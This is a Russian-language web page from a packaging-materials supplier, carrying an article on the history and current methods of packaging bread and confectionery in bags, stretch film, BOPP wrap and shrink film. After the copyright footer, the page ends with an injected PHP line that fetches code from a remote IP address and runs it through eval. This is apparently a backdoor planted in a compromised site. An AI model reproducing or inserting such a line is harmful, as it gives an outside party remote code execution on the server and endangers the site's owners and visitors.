packaging

Прайс-лист
Пленка ПВХ стрейч
  Загрузить (40 kb)

Современная упаковка для хлеба и кондитерских изделий

 


История упаковки хлеба


Для того, чтобы понять, что происходит на современном рынке упаковки для хлеба и попробовать заглянуть в будущее, начнем с истории.
 
Около 10 лет назад мы видели на прилавках магазинов хлебобулочные изделия без упаковки. Конечно, с одной стороны, это экономически выгодно – производитель не тратится на упаковку, но, в итоге, мы получаем черствеющий, сохнущий хлеб, из которого сыплются крошки и зерна, такой продукт имеет короткий период реализации. Если в те времена такое положение вещей казалось нормальным, то сегодня хлеб без упаковки уже не удовлетворяет большинство покупателей, как по гигиеническим, так и по эстетическим соображениям. Таким образом, экономически производитель не выигрывает.
 
Следующим этапом развития индустрии упаковки в хлебобулочной отрасли стало упаковывание изделий в полиэтиленовые пакеты. Но в данном случае, если пакеты открыты, потребитель снова сталкивается с антисанитарией и сохнущим хлебом. Покупатель отчетливо понимает, что за время доставки от завода изготовителя до торговой точки изделие могло соприкасаться со всевозможными загрязненными поверхностями и руками грузчиков, на хлеб могли садиться насекомые, он мог, допустим, упасть. Так было до недавнего времени, когда хлеб упаковывали непосредственно перед продажей. В наши дни почти все крупные хлебозаводы ушли от этой практики, теперь все больше становится популярным упаковывать хлебобулочные изделия. Пекарни, использующие дрожжи хлебопекарные, упаковывают предварительно нарезанный хлеб в полимерные пакеты, запечатанные клипсой или скотчем. Готовая к продаже продукция имеет эстетичный внешний вид и выгодно выделяется среди аналогов благодаря яркой печати, которую можно наносить на пакет и внешнему виду упаковки, напоминающей подарочный пакет.

Упаковывать в полиэтиленовую стретч-пленку на горячих столах


Но вернемся к истории. Вслед за полиэтиленовыми пакетами, с введением санитарно-гигиенических норм на хлебобулочную продукцию, хлеб стали упаковывать в полиэтиленовую (ПЭ) стретч-пленку на горячих столах. Принцип действия данного оборудования основан на свойствах упаковочного материала. Дело в том, что стретч-пленка имеет свойство «налипать» на саму себя. упаковывание осуществляется на оборудовании, которое называется горячими столами. Но в настоящее время большинство производителей отошли от упаковывания хлеба в стретч-пленку. В настоящее время распространена упаковка в стретч-пленку мелкоштучных хлебобулочных (слойки, пирожки) и кондитерских изделий (печенье, конфеты). Упаковывание осуществляется на подложке непосредственно в месте продажи, чаще всего это супер- и гипермаркеты. Кроме того, на подложке в стретч-пленку упаковывают овощные, мясные и рыбные полуфабрикаты, а так же готовые продукты. Горячие столы могут быть ручного, автоматического и полуавтоматического типа. У полуавтоматического и автоматического оборудования есть существенное преимущество перед горячими столами ручного типа – это экономный расход упаковочного материала (в ручных машинах оператору приходится самому приходится отмерять необходимое количество стретч-пленки). Единственное важное замечание – продукты нельзя упаковывать в горячем виде, т.к. стрейч пленка оплавляется, а что касается хлеба – на пленке будет образовываться конденсат, во время хранения может развиваться плесень.

Автоматические упаковочные машины горизонтального типа


Еще одним видом упаковки хлеба является его оборачивание БОПП пленкой на автоматических машинах горизонтального типа. Этот тип упаковки подходит для крупных хлебозаводов, т.к. производительность такого оборудования достигает 250 упаковок в минуту. Их главными качествами являются надежность швов, деликатное обращение с нежными и хрупкими изделиями, а так же возможность упаковывания продуктов различных габаритов. Кроме того, при использовании данного типа оборудования становится возможным упаковывать хлебобулочные изделия в специальных условиях: в модифицированной атмосфере для увеличения сроков реализации продукции и с использованием перфорации – для «дыхания» изделий, что особенно актуально для горячего хлеба. Но при использовании перфоррованной пленки необходимо учитывать, что продукт будет сохнуть быстрее, чем упакованный в неперфорированный материал. Таким образом, производитель подбирает необходимые опции исходя из желаемого срока хранения хлебобулочных изделий, температуры продукта и планируемых сроков реализации (в случае с перфорированной пленкой товар должен быть продан в кратчайшие сроки). Кроме различной хлебобулочной продукции, на упаковочных машинах горизонтального типа можно упаковывать широкий спектр кондитерских изделий, а так же штучные непищевые товары. Несомненным плюсом упаковывания в биориентированную полипропиленовую пленку (БОПП) является возможность нанесения на ее поверхность яркой печати, т.е. сам продукт становится рекламоносителем.

Термоусадочная упаковка


Следующим историческим этапом упаковывания хлебобулочной продукции стала термоусадка изделий. При этом используются специальные пленки, которые как бы сжимаются – усаживаются – при воздействии температуры. По степени автоматизации термоусадочное оборудование можно разделить на ручное, полуавтоматическое и автоматическое. Для хлебопекарной промышленности чаще всего используются машины ручного и полуавтоматического типа. Они компактны и просто не заменимы для мини-пекарен и супермаркетов, в которых осуществляется выпечка изделий непосредственно в торговой точке. Выбору упаковочного материала следует уделить особенное внимание.
 
По мнению большинства специалистов, упаковка в ПВХ пленку пищевых продуктов может оказать негативное влияние на организм человека. При упаковке хлебобулочных изделий предпочтительнее использовать полипропиленовые (ПП) или полиолефиновые (ПО) пленки. Возможно использование термоусадочных перфорированных материалов (перфорация наносится при производстве пленки) для упаковывания продукции в горячем виде. Такая пленка обладает превосходной паропроницаемостью вследствие наличия мельчайших дырочек, через которые и уходит излишняя влага. Таким образом, производитель экономит время и производственные площади на остывании продукции. Но с другой стороны хлеб быстро сохнет, т.к. через ту же перфорацию в упаковку поступает воздух. Продукт в такой упаковке рекомендуется хранить не более суток, т.к. перфорация, нанесенная во время изготовления пленки очень частая. Тем не менее, небольшая перфорация необходима, особенно для полиолефиновой пленки, которая не пропускает воздух. Для перфорирования материала на термоусадочном оборудовании часто ставится специальный блок, посредством которого наносится один ряд отверстий. Для того, чтобы можно было упаковывать горячий хлеб, необходима пре-перфорированная полиолефиновая пленка, на которую наносится перфорация механически, уже после экструзии (производства) пленки. Перфорация выполняется в несколько рядов, с одной стороны, хлеб «дышит» и излишняя влага испаряется, не конденсируясь на пленке изнутри, с другой стороны, хлеб сохнет не быстро, т.к. перфорация редкая.
 
Мелкие хлебобулочные и кондитерские изделия (пирожки, слойки, печенье, конфеты и пр.) рекомендуется упаковывать на термоусадочных машинах с использованием специальной подложки, чтобы товар не рассыпался и продукт на витрине выглядел презентабельно. Крупные изделия (батоны, плюшки и пр.) упаковывают без подложки. Кроме того, на термоусадочном оборудовании упаковывают коробки разных габаритов, это могут быть и коробки шоколадных конфет, и «телевизоры» для печенья и пряников. Помимо кондитерской и хлебобулочной продукции, при помощи термоусадочного оборудования формируют групповую упаковку стеклянных и жестяных банок, ПЭТ-бутылок,
полипропиленовых пакетов и пр. Так же термоусадка популярна для полиграфических изданий, CD- и DVD-дисков.

 

Что выбрать?


Подводя итоги имеющегося на современном упаковочном рынке оборудования, можно порекомендовать начинающим производителям выбирать машины для хлебобулочных изделий, исходя из формы и размеров продукта, желаемого срока хранения, выбора метода охлаждения после выпечки и, конечно же, внешнего вида будущей упаковки.
 
Если заглядывать в будущее, то с уверенностью можно сказать, что в ближайшие несколько лет хлеб, не упакованный непосредственно на производстве, исчезнет с прилавков наших магазинов и супермаркетов. Реформа уже началась, в первую очередь она затронет крупные города, но постепенно хлеб в упаковке дойдет и до наших регионов. Все более становится популярным нарезанный хлеб, упакованный в пакет с клипсой. Для пекарен, применяющих сухие дрожжи, которые выпекают хлеб непосредственно перед продажей оптимальной упаковкой можно назвать бумажный пакет со вставкой из полимерной пленки с перфорацией. Такая упаковка позволяет упаковывать хлеб в горячем виде. Хлебозаводам предоставляется прекрасная возможность упаковывать хлеб на высокопроизводительном оборудовании горизонтального типа, причем так же возможна и автоматическая загрузка изделий в машины, а яркая полиграфия позволит «не потеряться» нарезным батонам и Дарницкому хлебу в ярком многообразии продукции хлебопекарен.

Источник: www.pekarni.ru (HoReCa)

Вернуться назад

Rambler's Top100 Рейтинг@Mail.ru Яндекс.Метрика

                             Copyright © 2009-2013, DBI - упаковочные материалы
/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>